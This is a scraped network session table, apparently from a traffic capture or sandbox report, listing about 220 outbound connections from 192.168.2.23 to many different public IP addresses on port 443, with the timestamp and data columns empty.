                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10379192.168.2.2351630195.177.134.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10380192.168.2.2341134146.193.193.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10381192.168.2.234551046.87.182.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10382192.168.2.236003648.51.198.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10383192.168.2.2344420156.64.63.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10384192.168.2.2345820119.194.176.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10385192.168.2.2355850159.124.22.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10386192.168.2.2356382200.114.57.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10387192.168.2.234963432.121.164.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10388192.168.2.235610089.43.188.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10389192.168.2.234840899.71.12.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10390192.168.2.2351616135.90.179.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10391192.168.2.235927680.177.213.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10392192.168.2.2345786158.14.44.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10393192.168.2.2336522204.249.2.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10394192.168.2.233680894.14.171.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10395192.168.2.235860670.91.5.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10396192.168.2.2333036170.35.104.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10397192.168.2.235178492.198.15.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10398192.168.2.2339994195.145.198.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10399192.168.2.233599892.165.25.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10400192.168.2.2346286102.225.133.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10401192.168.2.2335356159.54.100.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10402192.168.2.235299496.22.3.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10403192.168.2.235956239.37.186.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10404192.168.2.234203486.200.25.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10405192.168.2.2348440177.67.42.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10406192.168.2.234584079.164.75.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10407192.168.2.2350406135.75.68.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10408192.168.2.2359834178.194.231.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10409192.168.2.235156086.87.129.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10410192.168.2.234223893.60.57.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10411192.168.2.2337808146.237.210.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10412192.168.2.2346534208.118.93.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10413192.168.2.235002058.133.226.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10414192.168.2.2333542109.194.91.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10415192.168.2.234051612.166.113.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10416192.168.2.2343756111.182.20.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10417192.168.2.235745423.155.105.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10418192.168.2.234993276.211.192.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10419192.168.2.2352172201.68.84.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10420192.168.2.2341856171.73.60.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10421192.168.2.2336880125.138.12.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10422192.168.2.2334256182.123.78.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10423192.168.2.2356958218.191.177.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10424192.168.2.2349108136.52.106.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10425192.168.2.2347540126.35.248.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10426192.168.2.2338162143.24.39.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10427192.168.2.234301253.231.17.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10428192.168.2.2335540168.151.255.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10429192.168.2.2354854173.69.110.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10430192.168.2.233360040.72.192.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10431192.168.2.2332846217.93.87.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10432192.168.2.233854269.223.185.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10433192.168.2.234397060.134.112.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10434192.168.2.233739660.87.129.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10435192.168.2.234648613.96.174.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10436192.168.2.2333480205.65.171.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10437192.168.2.23412344.24.251.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10438192.168.2.2335272171.241.10.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10439192.168.2.235380688.166.251.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10440192.168.2.2351692199.1.123.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10441192.168.2.235294278.33.98.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10442192.168.2.234379817.163.180.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10443192.168.2.2341892185.136.213.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10444192.168.2.2344060213.134.30.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10445192.168.2.234183640.239.63.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10446192.168.2.2357870133.131.219.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10447192.168.2.234885447.246.212.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10448192.168.2.2350454121.215.124.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10449192.168.2.2334242153.5.177.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10450192.168.2.234915060.203.58.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10451192.168.2.2350568125.35.89.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10452192.168.2.2352950164.171.249.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10453192.168.2.2340862102.54.118.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10454192.168.2.2336704106.143.114.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10455192.168.2.2357426121.197.71.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10456192.168.2.235647017.57.146.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10457192.168.2.235905623.245.161.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10458192.168.2.2353120134.145.161.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10459192.168.2.23559761.20.59.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10460192.168.2.235684098.200.197.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10461192.168.2.2339690104.118.45.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10462192.168.2.233403025.70.135.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10463192.168.2.2356582121.8.209.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10464192.168.2.2333716180.34.174.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10465192.168.2.234855243.79.157.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10466192.168.2.235318076.220.152.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10467192.168.2.234335885.101.98.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10468192.168.2.2352842199.3.42.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10469192.168.2.235324872.13.156.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10470192.168.2.2338426193.65.108.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10471192.168.2.2337694220.107.179.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10472192.168.2.2334012172.12.28.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10473192.168.2.2343682117.230.198.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10474192.168.2.23431269.61.72.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10475192.168.2.233736254.59.10.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10476192.168.2.235322679.185.129.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10477192.168.2.234788478.106.157.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10478192.168.2.235405665.12.212.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10479192.168.2.2355170133.243.42.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10480192.168.2.2333262208.174.82.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10481192.168.2.233310439.213.71.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10482192.168.2.233709693.100.100.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10483192.168.2.2337444113.64.101.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10484192.168.2.2350160105.204.33.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10485192.168.2.2342308141.24.71.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10486192.168.2.2352510112.245.136.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10487192.168.2.233877073.182.218.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10488192.168.2.235491812.75.251.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10489192.168.2.2334192176.91.43.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10490192.168.2.235641672.74.146.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10491192.168.2.2343822221.50.38.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10492192.168.2.2343560193.208.0.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10493192.168.2.2343696151.169.22.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10494192.168.2.2344546113.34.14.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10495192.168.2.2354318210.185.68.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10496192.168.2.2360310163.207.179.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10497192.168.2.2336102147.191.199.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10498192.168.2.2333890169.134.44.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10499192.168.2.2352358166.222.218.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10500192.168.2.2336940179.186.54.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10501192.168.2.2359736183.218.43.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10502192.168.2.2345836158.198.118.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10503192.168.2.234946051.247.204.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10504192.168.2.233320058.187.15.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10505192.168.2.2342414191.152.159.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10506192.168.2.2358774143.217.56.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10507192.168.2.23330928.1.160.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10508192.168.2.2335434156.158.44.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10509192.168.2.2359414106.232.123.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10510192.168.2.2351600120.175.73.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10511192.168.2.2353742104.127.203.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10512192.168.2.2346432124.220.85.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10513192.168.2.2359870193.151.150.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10514192.168.2.235105227.132.165.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10515192.168.2.233771443.69.201.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10516192.168.2.234329012.64.37.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10517192.168.2.235511092.4.51.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10518192.168.2.2348422204.161.137.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10519192.168.2.2344772220.152.208.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10520192.168.2.2337736212.163.189.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10521192.168.2.234644272.25.43.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10522192.168.2.235968648.208.91.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10523192.168.2.2349844111.116.114.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10524192.168.2.233717294.34.167.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10525192.168.2.2333152207.161.239.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10526192.168.2.2341538198.57.101.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10527192.168.2.234312632.229.174.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10528192.168.2.234036642.175.139.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10529192.168.2.234950086.176.130.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10530192.168.2.2358646148.95.200.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10531192.168.2.2338408197.176.97.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10532192.168.2.234431291.115.224.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10533192.168.2.2353706105.87.100.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10534192.168.2.2360816134.84.105.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10535192.168.2.2340534217.33.158.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10536192.168.2.2333738118.207.96.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10537192.168.2.235238214.121.204.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10538192.168.2.2348158188.183.51.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10539192.168.2.2358474181.143.166.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10540192.168.2.2358674204.15.137.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10541192.168.2.234909869.69.43.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10542192.168.2.234934687.223.56.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10543192.168.2.2359608128.247.143.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10544192.168.2.234036698.173.248.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10545192.168.2.2340182211.33.83.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10546192.168.2.2346752208.237.124.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10547192.168.2.2358538101.8.207.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10548192.168.2.234802853.44.173.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10549192.168.2.2343516216.160.16.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10550192.168.2.233784025.155.208.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10551192.168.2.2333756185.48.214.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10552192.168.2.2343112132.148.164.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10553192.168.2.233484446.66.167.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10554192.168.2.2350698108.31.49.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10555192.168.2.2357870121.22.129.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10556192.168.2.234230672.212.252.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10557192.168.2.2338536108.58.215.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10558192.168.2.236073445.127.206.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10559192.168.2.234095674.156.4.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10560192.168.2.2353112216.6.141.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10561192.168.2.234831823.250.169.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10562192.168.2.235190645.34.216.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10563192.168.2.234731895.125.176.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10564192.168.2.234637861.83.245.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10565192.168.2.234502237.223.176.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10566192.168.2.2333042208.83.17.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10567192.168.2.2353646100.251.143.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10568192.168.2.2348360184.104.109.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10569192.168.2.2337520116.31.45.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10570192.168.2.2341790113.211.175.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10571192.168.2.2333198206.40.156.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10572192.168.2.234256813.150.90.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10573192.168.2.235997046.76.243.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10574192.168.2.2358142129.35.106.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10575192.168.2.2349278159.90.0.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10576192.168.2.2353214164.114.159.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10577192.168.2.2334172120.76.224.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10578192.168.2.2335280125.29.14.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10579192.168.2.233968225.42.64.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10580192.168.2.2347478171.80.116.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10581192.168.2.2358768106.223.122.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10582192.168.2.236089835.95.127.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10583192.168.2.233311869.253.206.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10584192.168.2.234124287.38.91.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10585192.168.2.23353829.15.211.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10586192.168.2.2357700205.36.43.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10587192.168.2.2344618148.2.198.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10588192.168.2.2348080165.184.109.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10589192.168.2.2346932159.35.104.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10590192.168.2.2354930138.223.240.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10591192.168.2.234258091.11.157.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10592192.168.2.2358054107.32.11.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10593192.168.2.23358584.234.206.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10594192.168.2.234949089.157.186.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10595192.168.2.235997076.94.89.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10596192.168.2.2347536209.17.119.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10597192.168.2.233639695.151.112.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10598192.168.2.23533384.190.131.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10599192.168.2.2342696137.141.130.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10600192.168.2.234989024.188.185.132443
